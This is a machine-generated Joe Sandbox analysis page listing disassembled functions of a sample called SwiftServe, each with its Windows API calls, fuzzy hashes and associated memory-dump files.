Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 6c96ed7182fb54804e0ae312b8798f519698b40483f7ca999e1200367a5dd8be
Instruction ID: f61077a1a91d343116f628b8d9262436b15dd2e4dd988619d8fdfc53263878d8
Opcode Fuzzy Hash: 6c96ed7182fb54804e0ae312b8798f519698b40483f7ca999e1200367a5dd8be
Instruction Fuzzy Hash: 70F06732E4A7116AE674BB78BC4369B26D4DBC2734F21262AF4A0FA0D3EF5188454190

Function 00E441B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E44282,?), ref: 00E441D3
GetProcAddress.KERNEL32(00000000), ref: 00E441DA
EncodePointer.KERNEL32(00000000), ref: 00E441E6
DecodePointer.KERNEL32(00000001,00E44282,?), ref: 00E44203

Strings

RoInitialize, xrefs: 00E441C2
combase.dll, xrefs: 00E441CE

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: e982ff8b53b04e4b3b6528c91b637318d4fba4b5164d0b529f3335e770e6408c
Instruction ID: bfb29ed97ce82ad94a66fb0ece9972e812f55733904ac22f135ff0e0785d2cdb
Opcode Fuzzy Hash: e982ff8b53b04e4b3b6528c91b637318d4fba4b5164d0b529f3335e770e6408c
Instruction Fuzzy Hash: EFE09A71682B44AFDB101F72EC8DB4B36A4A702B0BF205924F681F90E0CBB4508C8F00

Function 00E4428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E441A8), ref: 00E442A8
GetProcAddress.KERNEL32(00000000), ref: 00E442AF
EncodePointer.KERNEL32(00000000), ref: 00E442BA
DecodePointer.KERNEL32(00E441A8), ref: 00E442D5

Strings

RoUninitialize, xrefs: 00E44297
combase.dll, xrefs: 00E442A3

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 821d8bbde5464b218ab4b249012f6a678f2a54d89d8b86346d68b5dd70381aad
Instruction ID: f0b5388050b1ce119bc806b65a657a5aa584952cc6c3cf4642b04af6d8a57fc7
Opcode Fuzzy Hash: 821d8bbde5464b218ab4b249012f6a678f2a54d89d8b86346d68b5dd70381aad
Instruction Fuzzy Hash: 6FE0B6B1652B44AFDB519FA2AD8DB473AA4B700B0AF601618F101F90F0CBB4650CCA14

Function 00E2218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00E221B8
GetWindowRect.USER32(?,?), ref: 00E221F9
ScreenToClient.USER32(?,?), ref: 00E22221
GetClientRect.USER32(?,?), ref: 00E22350
GetWindowRect.USER32(?,?), ref: 00E22369

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: ac63513620b5c9cfa073ba7fdab254f391ec797c796027b22ea7eb2bb4f6d2ad
Instruction ID: 7c350bb721e036169864c01ed3c9cfda2b4ebc0231aefe48fcb48abd2dc4d1a3
Opcode Fuzzy Hash: ac63513620b5c9cfa073ba7fdab254f391ec797c796027b22ea7eb2bb4f6d2ad
Instruction Fuzzy Hash: 05B1713990024AEBDF10CFA8C9807EEB7B1FF08314F14A529ED59EB254DB34A954CB64

Function 00E86A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E86BC6
_memmove.LIBCMT ref: 00E86B01

Part of subcall function 00E24D37: __itow.LIBCMT ref: 00E24D62
Part of subcall function 00E24D37: __swprintf.LIBCMT ref: 00E24DAC

_memmove.LIBCMT ref: 00E86B74
_memmove.LIBCMT ref: 00E86C5B
_memmove.LIBCMT ref: 00E86C74
_memmove.LIBCMT ref: 00E86C90

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: a337fdf05265ffef9fd0cd97148cd49bada3d37a0db2cc78441bb96f58637a9d
Instruction ID: 5321430e03edc9cc749892f2a460d37c1e7742f49e22502a8d0c2be799792d97
Opcode Fuzzy Hash: a337fdf05265ffef9fd0cd97148cd49bada3d37a0db2cc78441bb96f58637a9d
Instruction Fuzzy Hash: 0161897150069AABCF11FF60DC82EFE7BE8AF05308F046599F8597B292DB349945CB50

Function 00EA0844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E31A36: _memmove.LIBCMT ref: 00E31A77

Part of subcall function 00EA147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EA040D,?,?), ref: 00EA1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EA091D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EA095D
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00EA0980
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EA09A9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EA09EC
RegCloseKey.ADVAPI32(00000000), ref: 00EA09F9

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: a53ebbc53de500d7ca891ef786461ceb2b388d65af41be9c6b74f3e6abfe0c55
Instruction ID: b68d7f1401ae52845d79f868f3647ed5cb90cfc6d4a029f64241026570dc4459
Opcode Fuzzy Hash: a53ebbc53de500d7ca891ef786461ceb2b388d65af41be9c6b74f3e6abfe0c55
Instruction Fuzzy Hash: EC516831208200AFD714EF64C885E6BBBE9FF89314F04595DF489AB2A2DB31E905CB52

Function 00EA5DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00EA5E38
GetMenuItemCount.USER32(00000000), ref: 00EA5E6F
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00EA5E97
GetMenuItemID.USER32(?,?), ref: 00EA5F06
GetSubMenu.USER32(?,?), ref: 00EA5F14
PostMessageW.USER32(?,00000111,?,00000000), ref: 00EA5F65

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: a44117799e1b94089e29ba7be3da0f92034ce1e58a43ad6ac84c929213f04b17
Instruction ID: 58659e9864b539f48c988b251f77c9bc1d45039ff4ea78bd7dc7d076a36e4b7b
Opcode Fuzzy Hash: a44117799e1b94089e29ba7be3da0f92034ce1e58a43ad6ac84c929213f04b17
Instruction Fuzzy Hash: 8C515D76A01625AFCF11EF64C845AAEB7F5EF49320F105099E915BB391CB30BE418B91

Function 00E7F688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E7F6A2
VariantClear.OLEAUT32(00000013), ref: 00E7F714
VariantClear.OLEAUT32(00000000), ref: 00E7F76F
_memmove.LIBCMT ref: 00E7F799
VariantClear.OLEAUT32(?), ref: 00E7F7E6
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E7F814

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 138a67339bba10c6bc2067e5a9904a9b2d49d1b6bb625724d93a98c07524dc10
Instruction ID: 4dc0c91325ec1cd329206d67048c6f508ad5226098e94c8837eddfa7fcf84bf9
Opcode Fuzzy Hash: 138a67339bba10c6bc2067e5a9904a9b2d49d1b6bb625724d93a98c07524dc10
Instruction Fuzzy Hash: 4F514AB5A00209EFDB14CF58C894AAAB7B8FF4C354B15856AED59EB300D730E951CFA0

Function 00E829B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E829FF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E82A4A
IsMenu.USER32(00000000), ref: 00E82A6A
CreatePopupMenu.USER32 ref: 00E82A9E
GetMenuItemCount.USER32(000000FF), ref: 00E82AFC
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E82B2D

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 104a64f27ff5381cb6f74fb6ca44393f08794e6901d63d20b20ca4f0ef85e304
Instruction ID: 0314da97775a6072704f6e92cdf6e46594dad890bbd37817fe9d5627ed1e70ed
Opcode Fuzzy Hash: 104a64f27ff5381cb6f74fb6ca44393f08794e6901d63d20b20ca4f0ef85e304
Instruction Fuzzy Hash: B851CE30A01249DFCF25EF68D988AAEBBF4EF44318F10525DEA1DBB2A1D7709944CB51

Function 00E21B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00E229E2: GetWindowLongW.USER32(?,000000EB), ref: 00E229F3

BeginPaint.USER32(?,?,?,?,?,?), ref: 00E21B76
GetWindowRect.USER32(?,?), ref: 00E21BDA
ScreenToClient.USER32(?,?), ref: 00E21BF7
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E21C08
EndPaint.USER32(?,?), ref: 00E21C52

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: d1b1293bb7880f0b0374702a4f0ff60710cd306935d9f4f3a37bb81e1952912d
Instruction ID: da7eb998da0340254df7372fd1c0893cbcdc1d36d3c8afcde82278c7465d4ce8
Opcode Fuzzy Hash: d1b1293bb7880f0b0374702a4f0ff60710cd306935d9f4f3a37bb81e1952912d
Instruction Fuzzy Hash: 9F410330104314AFC710DF25ECC9FB77BE8EB65364F1006A9F994AB2A1C730A909DB61

Function 00EABD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00EE77B0,00000000,01845440,?,?,00EE77B0,?,00EABC1A,?,?), ref: 00EABD84
EnableWindow.USER32(?,00000000), ref: 00EABDA8
ShowWindow.USER32(00EE77B0,00000000,01845440,?,?,00EE77B0,?,00EABC1A,?,?), ref: 00EABE08
ShowWindow.USER32(?,00000004,?,00EABC1A,?,?), ref: 00EABE1A
EnableWindow.USER32(?,00000001), ref: 00EABE3E
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00EABE61

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: c7ba91455922b59c342dbabf540577c023e69240c66c5c9346f844ea1e315b46
Instruction ID: 3a44bcca149a48e6e32060f2e7edda7a2107edd235e1e5678b0115ec337e3df3
Opcode Fuzzy Hash: c7ba91455922b59c342dbabf540577c023e69240c66c5c9346f844ea1e315b46
Instruction Fuzzy Hash: EF412134600154AFDB26CF24C489BD57BE1FF0A318F1891A9EA59AF2A3C732B855CB51

Function 00E97788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00E9550C,?,?,00000000,00000001), ref: 00E97796

Part of subcall function 00E9406C: GetWindowRect.USER32(?,?), ref: 00E9407F

GetDesktopWindow.USER32 ref: 00E977C0
GetWindowRect.USER32(00000000), ref: 00E977C7
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E977F9

Part of subcall function 00E857FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E85877

GetCursorPos.USER32(?), ref: 00E97825
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E97883

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 89ed07081d142912a72561176096b57b13f9e980f92dd80590d7c2246aef087f
Instruction ID: 42acc1e800d8cb08216a7c76e243a270efe26322e465b2c2b8a81a726d81990d
Opcode Fuzzy Hash: 89ed07081d142912a72561176096b57b13f9e980f92dd80590d7c2246aef087f
Instruction Fuzzy Hash: 9531B072509315AFDB24DF14C849F9BB7E9FF88314F001A1AF589A7191CA31E909CBA2

Function 00E79431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E78CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E78CDE
Part of subcall function 00E78CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E78CE8
Part of subcall function 00E78CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E78CF7
Part of subcall function 00E78CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E78CFE
Part of subcall function 00E78CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E78D14

GetLengthSid.ADVAPI32(?,00000000,00E7904D), ref: 00E79482
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E7948E
HeapAlloc.KERNEL32(00000000), ref: 00E79495
CopySid.ADVAPI32(00000000,00000000,?), ref: 00E794AE
GetProcessHeap.KERNEL32(00000000,00000000,00E7904D), ref: 00E794C2
HeapFree.KERNEL32(00000000), ref: 00E794C9

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: be5eb2dde6133dbabb461433b25f8b9dd793f30c999707ef0d025424bd590468
Instruction ID: 1c69fbb9d242deb511069971f169495872fca9be24d6a7859f446aa820166d20
Opcode Fuzzy Hash: be5eb2dde6133dbabb461433b25f8b9dd793f30c999707ef0d025424bd590468
Instruction Fuzzy Hash: 6811DC72501204EFDB169FA9CC89BAF7BA9EF4131AF108118E959F3211E736A905CB60

Function 00E791CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E79200
OpenProcessToken.ADVAPI32(00000000), ref: 00E79207
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E79216
CloseHandle.KERNEL32(00000004), ref: 00E79221
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E79250
DestroyEnvironmentBlock.USERENV(00000000), ref: 00E79264

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 821c087e0a306d1111bc9f6504c02269101c2ad3587ac7384579bbd9fc34a441
Instruction ID: 8eb17f685e43a874a88e0cb4dd9e8874651a7024bf7f735956aa0abd532a6a50
Opcode Fuzzy Hash: 821c087e0a306d1111bc9f6504c02269101c2ad3587ac7384579bbd9fc34a441
Instruction Fuzzy Hash: 3611477250124AAFDB019FA4ED49BDF7BA9EF08308F048155FA08B2161D7729D64EB60

Function 00E7C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00E7C34E
GetDeviceCaps.GDI32(00000000,00000058), ref: 00E7C35F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E7C366
ReleaseDC.USER32(00000000,00000000), ref: 00E7C36E
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E7C385
MulDiv.KERNEL32(000009EC,?,?), ref: 00E7C397

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 8a6c7967caf107df5e20492ff1d5bd3260f3c1f6ec07ddc10c7330f5e26e5810
Instruction ID: 8a0b0d72de008d977f92bdb619dd84670dfb64eb5d33d0a999b5cf054014d1da
Opcode Fuzzy Hash: 8a6c7967caf107df5e20492ff1d5bd3260f3c1f6ec07ddc10c7330f5e26e5810
Instruction Fuzzy Hash: 29012175E00218BFEB109BA69C49A5BBFA8EB48751F1081A5FE08B7280D6709915CFA0

Function 00EAC552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00E216CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E21729
Part of subcall function 00E216CF: SelectObject.GDI32(?,00000000), ref: 00E21738
Part of subcall function 00E216CF: BeginPath.GDI32(?), ref: 00E2174F
Part of subcall function 00E216CF: SelectObject.GDI32(?,00000000), ref: 00E21778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00EAC57C
LineTo.GDI32(00000000,00000003,?), ref: 00EAC590
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EAC59E
LineTo.GDI32(00000000,00000000,?), ref: 00EAC5AE
EndPath.GDI32(00000000), ref: 00EAC5BE
StrokePath.GDI32(00000000), ref: 00EAC5CE

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 58db45731b6efbeedb1c7af47b21796f25f933447775e31e1c9b3e16f110838a
Instruction ID: dffff7f68f4eea7da28810a9af9a6e104cffed9c15ca787ea5e3162e0222d70f
Opcode Fuzzy Hash: 58db45731b6efbeedb1c7af47b21796f25f933447775e31e1c9b3e16f110838a
Instruction Fuzzy Hash: 4A115B7200410DBFDF029F95EC88FAB3FADEF08354F048521BA486A160D771AE58DBA0

Function 00E407BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E407EC
MapVirtualKeyW.USER32(00000010,00000000), ref: 00E407F4
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E407FF
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E4080A
